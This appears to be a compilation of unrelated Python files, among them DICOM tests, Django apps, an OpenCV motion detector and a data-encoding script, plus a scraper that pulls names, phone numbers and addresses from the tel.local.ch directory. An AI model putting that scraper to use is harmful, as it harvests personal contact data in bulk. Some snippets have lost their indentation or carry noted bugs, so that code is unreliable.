            dataset = test.ConcurrentPickledDicomObjectTaskSplitter(dicom_directory, {"CT"}, constraints={})

    def test_init_wrong_constraints_type(self):
        with self.assertRaises(TypeError):
            dataset = test.ConcurrentPickledDicomObjectTaskSplitter(dicom_directory, ["CT"], constraints=[])

    def test_iter(self):
        # Iterating a splitter yields a PickledDicomoFilePool, not the splitter itself.
        dataset = test.ConcurrentPickledDicomObjectTaskSplitter(dicom_directory, ["CT"], constraints={})
        dataset = iter(dataset)
        self.assertIsInstance(dataset, test.PickledDicomoFilePool)

    def test_next(self):
        dataset = test.ConcurrentPickledDicomObjectTaskSplitter(dicom_directory, ["CT"], constraints={})
        data = next(iter(dataset))
        self.assertIsInstance(data, list)

    def test_len(self):
        # len() reports how many entries have been consumed so far, not the total.
        dataset = iter(test.ConcurrentPickledDicomObjectTaskSplitter(dicom_directory, ["CT"], constraints={}))
        self.assertEqual(len(dataset), 0)
        next(dataset)
        self.assertEqual(len(dataset), 1)
        next(dataset)
        next(dataset)
        self.assertEqual(len(dataset), 3)

    def test_subset_correct_usage(self):
        data = test.ConcurrentPickledDicomObjectTaskSplitter(dicom_directory, ["CT"], constraints={})
        subset = data.subset({"Modality": "asd"})
        with self.assertRaises(StopIteration):
            next(iter(subset))

    def test_subset_wrong_constraint_type(self):
        data = test.ConcurrentPickledDicomObjectTaskSplitter(dicom_directory, ["CT"], constraints={})
        with self.assertRaises(TypeError):
            subset = data.subset(("Modality", 1))

    def test_iterate_over_all(self):
        data = iter(test.ConcurrentPickledDicomObjectTaskSplitter(dicom_directory, ["CT"], constraints={}))
        with self.assertRaises(StopIteration):
            while True:
                next(data)
        self.assertNotEqual(len(data), 0)

    def test_can_be_parallelized(self):
        # The splitter is the one iterator type that supports parallel workers.
        data = test.ConcurrentPickledDicomObjectTaskSplitter(dicom_directory, ["CT"], constraints={})
        self.assertEqual(data.can_be_parallelized(), True)

    def test_classes_correct_usage(self):
        data = test.ConcurrentPickledDicomObjectTaskSplitter(dicom_directory, ["CT"], constraints={})
        self.assertIsInstance(data.classes("Modality"), list)

    def test_classes_wrong_label_type(self):
        data = test.ConcurrentPickledDicomObjectTaskSplitter(dicom_directory, ["CT"], constraints={})
        with self.assertRaises(TypeError):
            data.classes(["Modality"])

    def test_summarize_correct_usage(self):
        data = test.ConcurrentPickledDicomObjectTaskSplitter(dicom_directory, ["CT"], constraints={})
        self.assertIsInstance(data.summarize("Modality", print_summary=False), test.gem.LabelCounter)

    def test_summarize_wrong_label_type(self):
        data = test.ConcurrentPickledDicomObjectTaskSplitter(dicom_directory, ["CT"], constraints={})
        with self.assertRaises(TypeError):
            data.summarize(["Modality"], print_summary=False)

    def test_summarize_wrong_constraints_type(self):
        data = test.ConcurrentPickledDicomObjectTaskSplitter(dicom_directory, ["CT"], constraints={})
        with self.assertRaises(TypeError):
            data.summarize("Modality", [], print_summary=False)

    def test_summarize_test_CT_constraint(self):
        data = test.ConcurrentPickledDicomObjectTaskSplitter(dicom_directory, ["CT"], constraints={})
        summary_1 = data.summarize("Modality", print_summary=False)
        summary_2 = data.summarize("BodyPartExamined", print_summary=False)
        self.assertNotEqual(str(summary_1), str(summary_2))

    def test_summarize_wrong_summary_type(self):
        data = test.ConcurrentPickledDicomObjectTaskSplitter(dicom_directory, ["CT"], constraints={})
        with self.assertRaises(TypeError):
            data.summarize("Modality", print_summary=None)
class TestDicomoDataset(unittest.TestCase):
    """Tests for the DicomoDataset factory helpers: from_file, from_directory
    and the path-dispatching get_dicomo_dataset."""

    def test_from_file_correct_usage(self):
        dataset = test.DicomoDataset.from_file(dicom_data_set, ["CT"])
        self.assertIsInstance(dataset, test.PickledDicomoDataSet)

    def test_from_file_wrong_file_path(self):
        with self.assertRaises(FileNotFoundError):
            test.DicomoDataset.from_file(wrong_dicom_file_path, ["CT"])

    def test_from_directory_correct_usage(self):
        dataset = test.DicomoDataset.from_directory(dicom_directory, ["CT"])
        self.assertIsInstance(dataset, test.ConcurrentPickledDicomObjectTaskSplitter)

    def test_from_directory_file_wrong_directory_path(self):
        with self.assertRaises(NotADirectoryError):
            test.DicomoDataset.from_directory(os.path.join(dicom_directory, "asd"), ["CT"])

    def test_get_dicomo_dataset_correct_usage_file(self):
        # A file path dispatches to a single-file dataset.
        dataset = test.DicomoDataset.get_dicomo_dataset(dicom_data_set)
        self.assertIsInstance(dataset, test.PickledDicomoDataSet)

    def test_get_dicomo_dataset_correct_usage_directory(self):
        # A directory path dispatches to a parallelizable task splitter.
        dataset = test.DicomoDataset.get_dicomo_dataset(dicom_directory)
        self.assertIsInstance(dataset, test.ConcurrentPickledDicomObjectTaskSplitter)

    def test_get_dicomo_dataset_wrong_directory_path(self):
        with self.assertRaises(NotADirectoryError):
            test.DicomoDataset.get_dicomo_dataset(wrong_dicom_file_path)

if __name__ == '__main__':
    unittest.main()
|
# This code is the same we have discussed in CSV file.
import unicodecsv

enrollments_filename = '/datasets/ud170/udacity-students/enrollments.csv'

## Longer version of code (replaced with shorter, equivalent version below)
# enrollments = []
# f = open(enrollments_filename, 'rb')
# reader = unicodecsv.DictReader(f)
# for row in reader:
#     enrollments.append(row)
# f.close()

# Read every enrollment row into a list of dicts keyed by column name.
with open(enrollments_filename, 'rb') as f:
    reader = unicodecsv.DictReader(f)
    enrollments = list(reader)

# Problem
### Write code similar to the above to load the engagement
### and submission data. The data is stored in files with
### the given filenames. Then print the first row of each
### table to make sure that your code works. You can use the
### "Test Run" button to see the output of your code.
engagement_filename = '/datasets/ud170/udacity-students/daily_engagement.csv'
submissions_filename = '/datasets/ud170/udacity-students/project_submissions.csv'

daily_engagement = None # Replace this with your code
project_submissions = None # Replace this with your code
# Solution
import unicodecsv
def read_csv(filename):
    """Read a CSV file and return its rows as a list of dicts (one per row)."""
    with open(filename, 'rb') as handle:
        return [row for row in unicodecsv.DictReader(handle)]

# Load all three tables with the shared helper.
enrollments = read_csv('enrollments.csv')
daily_engagement = read_csv('daily_engagement.csv')
project_submissions = read_csv('project_submissions.csv')
|
from __future__ import annotations
from copy import deepcopy
from typing import TypeVar, TYPE_CHECKING, List, cast, Any, NoReturn, Optional
from errors.not_impl_error import NotImplError
from keywords import *
from position import Position
if TYPE_CHECKING:
from context import Context
from lang_types.lang_bool import LangBool
CompType = LangBool
T = TypeVar("T", bound="LangType")
class LangType:
    """Base class for every runtime value of the language.

    Subclasses override the operator hooks (added_to, get_comparison_eq,
    anded_by, call, ...) that they support; the defaults below raise a
    positioned NotImplError, so unsupported operators fail with source
    location information.
    """

    def __init__(
        self,
        type_name: str,
        pos_start: Position,
        pos_end: Position,
        context: Context,
        deep_copied: Optional[List[str]] = None,
    ):
        self.pos_start = pos_start
        self.pos_end = pos_end
        self.context = context
        # Attribute names listed here are deep-copied by copy();
        # all other attributes are shared by reference.
        self.deep_copied = deep_copied if deep_copied else []
        self.type_name = type_name

    def set_pos(self: T, pos_start: Position, pos_end: Position) -> T:
        """Update the source span of this value; returns self for chaining."""
        self.pos_start = pos_start
        self.pos_end = pos_end
        return self

    def set_context(self: T, context: Context) -> T:
        """Attach the evaluation context; returns self for chaining."""
        self.context = context
        return self

    def copy(self: T) -> T:
        """Copy this value without invoking __init__: attributes named in
        self.deep_copied are deep-copied, the rest are shared."""
        cls = type(self)
        result = cast(T, cls.__new__(cls))
        for key, value in self.__dict__.items():
            if key in self.deep_copied:
                setattr(result, key, deepcopy(value))
            else:
                setattr(result, key, value)
        return result

    # --- Arithmetic operators (default: unsupported) ---
    def added_to(self, other: LangType) -> OperType:
        return self._not_impl("+")

    def multiplied_by(self, other: LangType) -> OperType:
        return self._not_impl("*")

    def subtracted_by(self, other: LangType) -> OperType:
        return self._not_impl("-")

    def divided_by(self, other: LangType) -> OperType:
        return self._not_impl("/")

    def raised_to_power_by(self, other: LangType) -> OperType:
        return self._not_impl("^")

    # --- Comparison operators (default: unsupported) ---
    def get_comparison_eq(self, other: LangType) -> CompType:
        return self._not_impl("==")

    def get_comparison_ne(self, other: LangType) -> CompType:
        return self._not_impl("!=")

    def get_comparison_lt(self, other: LangType) -> CompType:
        return self._not_impl("<")

    def get_comparison_gt(self, other: LangType) -> CompType:
        return self._not_impl(">")

    def get_comparison_lte(self, other: LangType) -> CompType:
        return self._not_impl("<=")

    def get_comparison_gte(self, other: LangType) -> CompType:
        return self._not_impl(">=")

    # --- Logical operators (default: unsupported) ---
    def anded_by(self, other: LangType) -> CompType:
        return self._not_impl(f'KEYWORD:{KEYWORDS["AND"]}')

    def ored_by(self, other: LangType) -> CompType:
        return self._not_impl(f'KEYWORD:{KEYWORDS["OR"]}')

    def notted(self) -> CompType:
        return self._not_impl(f'KEYWORD:{KEYWORDS["NOT"]}')

    def call(self, context: Context, args: List[LangType]) -> LangType:
        """Invoke this value as a function; only callable types override this."""
        raise NotImplError(self.pos_start, self.pos_end, "Call")

    def _not_impl(self, error_msg: str) -> NoReturn:
        # Shared raiser so every default hook reports its operator symbol.
        raise NotImplError(self.pos_start, self.pos_end, error_msg)

    @property
    def value(self) -> Any:
        # Concrete types expose their underlying Python value; base has none.
        return None

# Alias used in the annotations above; resolvable after the class body
# because `from __future__ import annotations` makes annotations lazy.
OperType = LangType
|
# Price a purchase of one or two games; the second game (if any)
# is sold with a 25% discount.
game_count = int(input("Quantidade de jogos (1 / 2): "))
first_price = float(input("Valor do jogo 1: "))
if game_count != 2:
    total = first_price
else:
    second_price = float(input("Valor do jogo 2: "))
    total = first_price + second_price * 0.75
print(round(total, 2))
from bs4 import BeautifulSoup
import csv
import requests
import re
def scrape(next_page_url):
    """Fetch a page with a browser-like User-Agent and return parsed soup."""
    page = requests.get(next_page_url, headers={'User-Agent': 'Mozilla/5.0'})
    return BeautifulSoup(page.text, "html.parser")
def getDetailsInPage(url):
    """Print name, phone number and address for listings found via url.

    Python 2 module (print statements); emits one quoted CSV-style line
    per listing.
    """
    soup = scrape(url)
    # First token of the listings title is the result count (last char stripped).
    total = int(soup.find('div',{'class':'listings-title'}).find('h1').text.split(" ")[0][0:-1])+1
    print total
    if(total>100):
        total =100
    # NOTE(review): `total` is computed and clamped above but never used --
    # the loop always requests pages 1..100; confirm whether it should be
    # bounded by the actual result count instead.
    for i in range(1,101):
        j = str(i)
        link = url+'&page='+j
        soup = scrape(link)
        divs = soup.findAll('div',{'class':'local-listing'})
        for div in divs:
            name = div.find('h2').find('a').text
            # The phone-number anchor may be absent; fall back to empty string.
            number = div.find('a', {'class': 'number'})
            if(number != None):
                number = number.text
            else:
                number=''
            address = div.find('span',{'class':'address'}).text
            print '"'+name+'"'+","+'"'+number+'"'+","+'"'+address+'"'
# Scrape two search queries back to back.
url = "https://tel.local.ch/en/q?what=y&where="
url1 = "https://tel.local.ch/en/q?what=z&where="
getDetailsInPage(url)
getDetailsInPage(url1)
|
from django.conf.urls import patterns, url
from animals import views
# CRUD routes for the animals app (old-style Django `patterns` syntax).
urlpatterns = patterns('',
    url(r'^$',
        views.Index.as_view(),
        name='index'),
    url(r'^(?P<pk>\d+)/$',
        views.AnimalDetail.as_view(),
        name='detail'),
    url(r'^(?P<pk>\d+)/update/$',
        views.AnimalUpdate.as_view(),
        name='update'),
    url(r'^create/$',
        views.AnimalCreate.as_view(),
        name='create'),
    # NOTE(review): the 'delete' route is wired to AnimalUpdate -- this looks
    # like a copy-paste slip; confirm whether views.AnimalDelete exists and
    # should be used here.
    url(r'^(?P<pk>\d+)/delete/$',
        views.AnimalUpdate.as_view(),
        name='delete'),
)
|
from django import forms
from django.forms import ModelForm

from .models import Order


class OrderUpdate(forms.ModelForm):
    """ModelForm for editing an order's end / plated-end timestamps."""

    class Meta:
        model = Order
        fields = ('end_at', 'plated_end_at')
        # Bootstrap styling on the datetime inputs.
        widgets = {
            'end_at': forms.DateTimeInput(attrs={'class':'form-control'}),
            'plated_end_at': forms.DateTimeInput(attrs={'class':'form-control'}),
        }
|
# coding:utf-8
import socket
# Response prefix: minimal HTTP status line + header terminator followed by
# the opening half of an XHTML document.
T1="""HTTP/1.1 200 OK\r\n\r\n
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Null</title>
</head>
<body>
"""
# Response suffix: closes the document opened by T1.
T2="""
</body>
</html>
"""
def handle_request(client):
    """Read one request from the client socket and echo it back as HTML.

    Python 2 code (print statement, str-based socket send).
    """
    buf = client.recv(1024)
    print buf
    # Convert newlines so the raw request renders line-by-line in the browser.
    T3=str(buf).replace('\n','<br />')
    client.send(T1+T3+T2)
    #client.send("Hello, World")
def main():
    """Serve forever on localhost:8080, echoing each request back as HTML.

    Handles one connection at a time; each client socket is closed even if
    the handler raises, and the listening socket is closed on exit.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Allow quick restarts without "address already in use" errors.
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(('localhost', 8080))
    sock.listen(5)
    try:
        while True:
            connection, address = sock.accept()
            try:
                handle_request(connection)
            finally:
                # Close the client socket even when the handler fails,
                # instead of leaking the descriptor.
                connection.close()
    finally:
        sock.close()

if __name__ == '__main__':
    main()
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from google.appengine.ext import db
#Define some data models
class place_address(db.Model):
    """Master record for one QR code: owner info, contact card fields,
    redirect/analytics settings and the mini-web page slots."""

    # This is the master dictionary containing all qr-codes and contact details
    owner = db.UserProperty(auto_current_user_add=True)
    user_id = db.StringProperty(multiline=False)
    Date_created = db.DateTimeProperty(auto_now_add=True)
    Key_Name_String = db.StringProperty(multiline=False)
    # These are the existing fields in the card
    First_Name = db.StringProperty(multiline=False)
    Middle_Name = db.StringProperty(multiline=False)
    Last_Name = db.StringProperty(multiline=False)
    Organisation = db.StringProperty(multiline=False)
    W_address_line_1 = db.StringProperty(multiline=False)
    W_address_line_2 = db.StringProperty(multiline=False)
    W_address_Post_Town = db.StringProperty(multiline=False)
    W_address_County = db.StringProperty(multiline=False)
    W_address_Post_Code = db.StringProperty(multiline=False)
    W_address_Country = db.StringProperty(multiline=False)
    Email_address = db.StringProperty(multiline=False)
    Work_Phone = db.StringProperty(multiline=False)
    Home_Phone = db.StringProperty(multiline=False)
    Mobile_Phone = db.StringProperty(multiline=False)
    Web_url = db.StringProperty(multiline=False)
    #Text_message = db.StringProperty(multiline=True)
    # String property is limited to less than 500 characters. Text has no limit
    Text_message = db.TextProperty()
    Auto_forward = db.StringProperty(multiline=False)
    Google_analytics = db.StringProperty(multiline=False)
    Stat_counter = db.StringProperty(multiline=False)
    # These are the new fields in the card
    Tel1 = db.StringProperty(multiline=False)
    Tel2 = db.StringProperty(multiline=False)
    Tel3 = db.StringProperty(multiline=False)
    CardID = db.StringProperty(multiline=False)
    Cardtitle = db.StringProperty(multiline=False)
    Datesold = db.StringProperty(multiline=False)
    Datecreated = db.StringProperty(multiline=False)
    Datewarrexp = db.StringProperty(multiline=False)
    Day = db.StringProperty(multiline=False)
    Dutylist = db.StringProperty(multiline=False)
    Email2 = db.StringProperty(multiline=False)
    Endate = db.StringProperty(multiline=False)
    ItemID = db.StringProperty(multiline=False)
    LabelID = db.StringProperty(multiline=False)
    Latlong = db.StringProperty(multiline=False)
    Locationname = db.StringProperty(multiline=False)
    Make = db.StringProperty(multiline=False)
    Offers = db.StringProperty(multiline=False)
    Persontitle = db.StringProperty(multiline=False)
    Price1 = db.StringProperty(multiline=False)
    Price2 = db.StringProperty(multiline=False)
    Price3 = db.StringProperty(multiline=False)
    Qualifications = db.StringProperty(multiline=False)
    Reminderdate = db.StringProperty(multiline=False)
    Spareblank1 = db.StringProperty(multiline=False)
    Spareblank2 = db.StringProperty(multiline=False)
    Sparebusiness1 = db.StringProperty(multiline=False)
    Sparebusiness2 = db.StringProperty(multiline=False)
    Spareduty1 = db.StringProperty(multiline=False)
    Spareduty2 = db.StringProperty(multiline=False)
    Spareevent1 = db.StringProperty(multiline=False)
    Spareevent2 = db.StringProperty(multiline=False)
    Sparegoto1 = db.StringProperty(multiline=False)
    Sparegoto2 = db.StringProperty(multiline=False)
    SpareICE1 = db.StringProperty(multiline=False)
    SpareICE2 = db.StringProperty(multiline=False)
    Sparelocation1 = db.StringProperty(multiline=False)
    Sparelocation2 = db.StringProperty(multiline=False)
    Sparemembership1 = db.StringProperty(multiline=False)
    Sparemembership2 = db.StringProperty(multiline=False)
    Spareoffer1 = db.StringProperty(multiline=False)
    Spareoffer2 = db.StringProperty(multiline=False)
    Spareservice1 = db.StringProperty(multiline=False)
    Spareservice2 = db.StringProperty(multiline=False)
    Sparestock1 = db.StringProperty(multiline=False)
    Sparestock2 = db.StringProperty(multiline=False)
    Sparetour1 = db.StringProperty(multiline=False)
    Sparetour2 = db.StringProperty(multiline=False)
    Startdate = db.StringProperty(multiline=False)
    Status = db.StringProperty(multiline=False)
    Itemlist = db.StringProperty(multiline=False)
    Type = db.StringProperty(multiline=False)
    URL2 = db.StringProperty(multiline=False)
    URLsocialnets = db.StringProperty(multiline=False)
    # These are the mini web fields
    mini_web_01 = db.StringProperty(multiline=False)
    mini_web_02 = db.StringProperty(multiline=False)
    mini_web_03 = db.StringProperty(multiline=False)
    mini_web_04 = db.StringProperty(multiline=False)
    mini_web_05 = db.StringProperty(multiline=False)
    mini_web_06 = db.StringProperty(multiline=False)
    mini_web_07 = db.StringProperty(multiline=False)
    mini_web_08 = db.StringProperty(multiline=False)
    mini_web_09 = db.StringProperty(multiline=False)
    mini_web_10 = db.StringProperty(multiline=False)
    scan_counter = db.StringProperty(multiline=False)
class account_manager(db.Model):
    """Per-user account record: identity, status flags, limits and
    renewal/trial dates."""

    owner = db.UserProperty(auto_current_user_add=True)
    nickname = db.StringProperty(multiline=False)
    email = db.StringProperty(multiline=False)
    user_id = db.StringProperty(multiline=False)
    Date_created = db.DateTimeProperty(auto_now_add=True)
    # Bug fix: the first positional argument of a Property is verbose_name,
    # so db.BooleanProperty(False) set the *name* to False and left the
    # default as None. Pass default= explicitly so new entities start False.
    account_valid = db.BooleanProperty(default=False)
    suspend_account = db.BooleanProperty(default=False)
    opt_in_to_contact = db.BooleanProperty(default=False)
    page_limit = db.StringProperty(multiline=False)
    renewal_date = db.DateTimeProperty()
    free_trial_end = db.DateTimeProperty()
    total_scan_counter = db.StringProperty(multiline=False)
    renewal_confirm_date = db.DateTimeProperty()
    success_message = db.StringProperty(multiline=False)
class q_action_manager(db.Model):
    """Datastore record holding the system-wide scan counter (stored as a string)."""
    system_scan_counter = db.StringProperty(multiline=False)
|
import cv2, time, pandas
from datetime import datetime

first_frame = None           # reference frame that later frames are diffed against
statu_list = [None, None]    # last two motion states (0 = still, 1 = motion)
times = []                   # timestamps of motion start/end transitions
df = pandas.DataFrame(columns=["Start", "End"])
video = cv2.VideoCapture(0)
while True:
    check, frame = video.read()
    statu = 0
    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    gray = cv2.GaussianBlur(gray, (21, 21), 0)
    if first_frame is None:
        # First captured frame becomes the still-background reference.
        first_frame = gray
        continue
    detla_frame = cv2.absdiff(first_frame, gray)
    thresh_delta = cv2.threshold(detla_frame, 30, 255, cv2.THRESH_BINARY)[1]
    # BUG FIX: iterations=0 performed no dilation at all; dilate once so
    # small holes in the thresholded blobs are closed.
    thresh_delta = cv2.dilate(thresh_delta, None, iterations=1)
    # NOTE(review): 2-tuple unpacking assumes an OpenCV version whose
    # findContours returns (contours, hierarchy) — confirm cv2.__version__.
    (cnts, _) = cv2.findContours(thresh_delta.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
    for contour in cnts:
        if cv2.contourArea(contour) < 100:
            continue
        # BUG FIX: statu was previously set to 1 unconditionally before this
        # loop, so every frame counted as motion; flag motion only when a
        # sufficiently large contour is actually found.
        statu = 1
        (x, y, w, h) = cv2.boundingRect(contour)
        cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 3)
    statu_list.append(statu)
    statu_list = statu_list[-2:]
    if statu_list[-1] == 1 and statu_list[-2] == 0:
        times.append(datetime.now())  # motion started
    if statu_list[-1] == 0 and statu_list[-2] == 1:
        times.append(datetime.now())  # motion ended
    cv2.imshow("FRAME", frame)
    cv2.imshow("GRAY", gray)
    cv2.imshow("Delta", detla_frame)
    cv2.imshow("thresh", thresh_delta)
    print(statu_list)
    print(times)
    # for i in range(0, len(times), 2):
    #     df = df.append({"Start": times[i], "End": times[i + 1]}, ignore_index=True)
    # df.to_csv("Times.csv")
    key = cv2.waitKey(1)
    if key == ord("q"):
        break
video.release()
cv2.destroyAllWindows()
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
# import cv2, time
# video = cv2.VideoCapture(0)
# first_frame = None
# while True:
# check, frame = video.read()
# gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# gray = cv2.GaussianBlur(gray, (21,21), 0)
# if first_frame is None:
# first_frame = gray
# continue
# delta_frame = cv2.absdiff(first_frame, gray)
# thresshold_frame = cv2.threshold(delta_frame, 30 , 255, cv2.THRESH_BINARY) [1]
# thresshold_frame = cv2.dilate(thresshold_frame, None , iterations= 1)
# (cntr,_) = cv2.findContours(thresshold_frame.copy(), cv2.RETR_EXTERNAL , cv2.CHAIN_APPROX_SIMPLE)
# for contour in cntr:
# if cv2.contourArea(contour) < 500:
# continue
# (x,y,w,h) = cv2.boundingRect(contour)
# cv2.rectangle(frame, (x,y) , (x+w , y+h) , (0,255,0), 3)
# cv2.imshow("FRAME", frame)
# key = cv2.waitKey(1)
# if key == ord(" "):
# break
# video.release()
# cv2.destroyAllWindows()
""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" |
#!/usr/bin/python
#show "Hello World on the LCD screen""
# CByrer
import subprocess
import Adafruit_CharLCD as LCD
import time
lcd = LCD.Adafruit_CharLCDPlate()
# Hostname shown on the first LCD line.
Name = subprocess.check_output(['hostname']).strip()
displayText = Name
# IP address(es) for the second line of the default screen.
IP = subprocess.check_output(["hostname", "-I"])
refresh = True
while (True):
    if lcd.is_pressed(LCD.SELECT):
        # SELECT pressed: show the greeting screen.
        lcd.clear()
        lcd.message(displayText + "\n")
        lcd.set_backlight(1)
        lcd.message("Hello World\n")
        refresh = True
        time.sleep(1)
    else:
        if refresh:
            # Redraw the default hostname/IP screen once after the greeting,
            # then idle until the button is pressed again.
            lcd.clear()
            lcd.set_backlight(1)
            lcd.message(displayText + "\n")
            lcd.message(IP)
            time.sleep(1)
            refresh = False
|
# Create your views here.
#coding=utf-8
from django.http import *
from django.shortcuts import *
import datetime
def hello(request):
    """Trivial view: respond with a fixed plain-text body."""
    # NOTE(review): "hello word" looks like a typo for "hello world" —
    # confirm before changing, since callers/tests may assert the exact body.
    return HttpResponse("hello word")
def loginAction(request):
    """
    Render the login page with the current server time.
    :param request: incoming HttpRequest (only used for dispatch)
    :return: rendered login.html with {'time': now}
    """
    time = datetime.datetime.now()
    # NOTE(review): render_to_response was removed in Django 2.0; on a modern
    # Django this should become render(request, 'login.html', {...}).
    return render_to_response('login.html',{'time':time})
|
class Dog(object):
    """Singleton: every instantiation returns the same cached object, and only
    the first constructor call sets the name."""
    __instance = None  # class attribute caching the single instance
    __flag = True      # True until __init__ has run once
    def __init__(self, name):
        # Only the very first call may set the name; later Dog(...) calls
        # reuse the existing instance untouched.
        if Dog.__flag:
            self.name = name
            Dog.__flag = False
    def __new__(cls, *args, **kwargs):
        # Idiom fix: compare against None with `is`, not `==`; the redundant
        # if/else (both branches returned the cached instance) is collapsed.
        if cls.__instance is None:
            cls.__instance = super().__new__(cls)  # cache the sole instance
        return cls.__instance
# Demo: both constructions return the same cached instance, so the two ids
# match and the name stays the one given first ("小红").
dog = Dog("小红")
dog1 = Dog("小米")
print(id(dog))
print(id(dog1))
print(dog.name)
print(dog1.name)
|
import os
from enum import Enum
from logging import Logger
from typing import Optional
import pandas as pd
from mdrsl.data_handling.one_hot_encoding.encoding_book_keeping import EncodingBookKeeper
from mdrsl.data_handling.one_hot_encoding.encoding_io import store_encoding_book_keeper
from experiments.utils.experiment_logging import create_logger, close_logger
from experiments.file_naming.column_encodings import get_encodings_book_keeper_abs_file_name_for
from project_info import project_dir
# Directory layout (relative to project_dir) for the original, processed and
# one-hot encoded ARC-bench folds.
original_data_dir_relative_root = 'data/arcBench/folds_discr2'
processed_data_dir_relative_root = 'data/arcBench_processed/'
one_hot_encoded_data_dir_relative_root = 'data/arcBench_processed/folds_discr2_one_hot_encoded'
class TrainTestEnum(Enum):
    """Marker for which half of a train/test split a path refers to."""
    train = 'train'
    test = 'test'
def get_original_fold_data_dir(train_test: Optional[TrainTestEnum] = None) -> str:
    """Return (creating it if needed) the directory holding the original fold data.

    :param train_test: optional split selector; when given, a subdirectory
        named after the split value is used.
    """
    if train_test is None:
        original_data_dir = os.path.join(project_dir, original_data_dir_relative_root)
    else:
        original_data_dir = os.path.join(project_dir, original_data_dir_relative_root, train_test.value)
    # exist_ok avoids the race between the exists() check and makedirs()
    # when several folds are processed concurrently.
    os.makedirs(original_data_dir, exist_ok=True)
    return original_data_dir
def get_original_data_fold_abs_file_name(dataset_name: str, fold_i: int, train_test: TrainTestEnum) -> str:
    """Absolute path of the original CSV for one dataset fold and split."""
    fold_dir = get_original_fold_data_dir(train_test)
    return os.path.join(fold_dir, f"{dataset_name}{fold_i}.csv")
def get_original_full_data_abs_file_name(dataset_name: str, fold_i: int) -> str:
    """Absolute path of the full (train+test) un-encoded CSV for one fold."""
    original_full_data_dir: str = os.path.join(project_dir, processed_data_dir_relative_root, 'full_data')
    # exist_ok avoids the check-then-create race under concurrent runs.
    os.makedirs(original_full_data_dir, exist_ok=True)
    return os.path.join(original_full_data_dir, f'{dataset_name}{fold_i}.csv')
# --- one-hot encoded -------------------------------------------
def get_one_hot_encoded_fold_data_dir(train_test: Optional[TrainTestEnum] = None) -> str:
    """Return (creating it if needed) the directory holding one-hot encoded fold data.

    :param train_test: optional split selector; when given, a subdirectory
        named after the split value is used.
    """
    if train_test is None:
        one_hot_encoded_data_dir = os.path.join(project_dir, one_hot_encoded_data_dir_relative_root)
    else:
        one_hot_encoded_data_dir = os.path.join(project_dir, one_hot_encoded_data_dir_relative_root, train_test.value)
    # exist_ok avoids the race between the exists() check and makedirs().
    os.makedirs(one_hot_encoded_data_dir, exist_ok=True)
    return one_hot_encoded_data_dir
def get_one_hot_encoded_data_fold_abs_file_name(dataset_name: str, fold_i: int, train_test: TrainTestEnum) -> str:
    """Absolute path of the one-hot encoded CSV for one dataset fold and split."""
    fold_dir = get_one_hot_encoded_fold_data_dir(train_test)
    return os.path.join(fold_dir, f"{dataset_name}{fold_i}.csv")
def get_one_hot_encoded_full_data_abs_file_name(dataset_name: str, fold_i: int) -> str:
    """Absolute path of the full (train+test) one-hot encoded CSV for one fold."""
    one_hot_encoded_full_data_dir: str = os.path.join(project_dir, processed_data_dir_relative_root,
                                                      'full_data_one_hot_encoded')
    # exist_ok avoids the check-then-create race under concurrent runs.
    os.makedirs(one_hot_encoded_full_data_dir, exist_ok=True)
    return os.path.join(one_hot_encoded_full_data_dir, f'{dataset_name}{fold_i}.csv')
def convert_to_categorical(dataframe: pd.DataFrame, dataset_name: str, fold_i: int,
                           logger: Optional[Logger] = None) -> pd.DataFrame:
    """Cast every non-object column of *dataframe* to dtype object, in place.

    Each conversion is reported through *logger* when given, otherwise printed.
    Returns the (mutated) dataframe for chaining.
    """
    for col_name in dataframe.columns:
        original_dtype = dataframe[col_name].dtype
        if original_dtype == object:
            continue
        dataframe[col_name] = dataframe[col_name].astype('object')
        message = f"{dataset_name}{fold_i}: changed type of column {col_name} from {original_dtype} to object"
        if logger is None:
            print(message)
        else:
            logger.info(message)
    return dataframe
def one_hot_encode_dataset_fold(dataset_name: str, fold_i: int, ohe_prefix_separator: str) -> None:
    """
    One-hot encodes each of the Arch-bench fold train-test splits.

    Pipeline: read the fold's original train/test CSVs, cast all columns to
    object, concatenate them so train and test share one encoding, one-hot
    encode the concatenation, persist an EncodingBookKeeper for the column
    mapping, then split the encoded data back and write train/test files.
    """
    logger = create_logger(
        logger_name=f'one_hot_encode{dataset_name}{fold_i}',
        log_file_name=os.path.join(get_one_hot_encoded_fold_data_dir(train_test=None),
                                   f"{dataset_name}{fold_i}.log")
    )
    # Keep a column for every category level so the book keeper sees all values.
    drop_first = False
    # === For fold i ====
    # --- Read in the original train and test data from archbench -----------------------------------------------------
    original_train_data_fold_abs_file_name = get_original_data_fold_abs_file_name(dataset_name, fold_i,
                                                                                 TrainTestEnum.train)
    original_test_data_fold_abs_file_name = get_original_data_fold_abs_file_name(dataset_name, fold_i,
                                                                                TrainTestEnum.test)
    logger.info(f"Loading train fold: {original_train_data_fold_abs_file_name}")
    logger.info(f"Loading test fold: {original_test_data_fold_abs_file_name}")
    original_train_df = pd.read_csv(original_train_data_fold_abs_file_name, delimiter=',')
    original_test_df = pd.read_csv(original_test_data_fold_abs_file_name, delimiter=',')
    # --- Set each column to 'object' ------- -------------------------------------------------------------------------
